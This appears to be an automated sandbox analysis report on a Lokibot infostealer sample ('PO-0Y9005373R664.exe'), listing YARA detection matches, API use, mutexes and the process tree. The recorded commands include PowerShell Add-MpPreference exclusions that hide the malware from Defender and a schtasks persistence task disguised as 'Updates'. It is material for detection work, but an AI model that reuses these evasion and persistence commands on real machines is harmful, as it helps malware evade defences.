                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                        Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                        Source: PO-0Y9005373R664.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: VvtddClQv.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PO-0Y9005373R664.exe, fV.csCryptographic APIs: 'CreateDecryptor'
                        Source: PO-0Y9005373R664.exe, fV.csCryptographic APIs: 'CreateDecryptor'
                        Source: VvtddClQv.exe.0.dr, fV.csCryptographic APIs: 'CreateDecryptor'
                        Source: VvtddClQv.exe.0.dr, fV.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, TP.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, TP.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, TP.csCryptographic APIs: 'CreateDecryptor'
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, TP.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Gaqf9DrSrRGZEHH27Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Gaqf9DrSrRGZEHH27Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/17@0/1
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,14_2_0040434D
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile created: C:\Users\user\AppData\Roaming\VvtddClQv.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB962.tmpJump to behavior
                        Source: PO-0Y9005373R664.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PO-0Y9005373R664.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PO-0Y9005373R664.exeReversingLabs: Detection: 52%
                        Source: PO-0Y9005373R664.exeVirustotal: Detection: 58%
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile read: C:\Users\user\Desktop\PO-0Y9005373R664.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\VvtddClQv.exe C:\Users\user\AppData\Roaming\VvtddClQv.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"
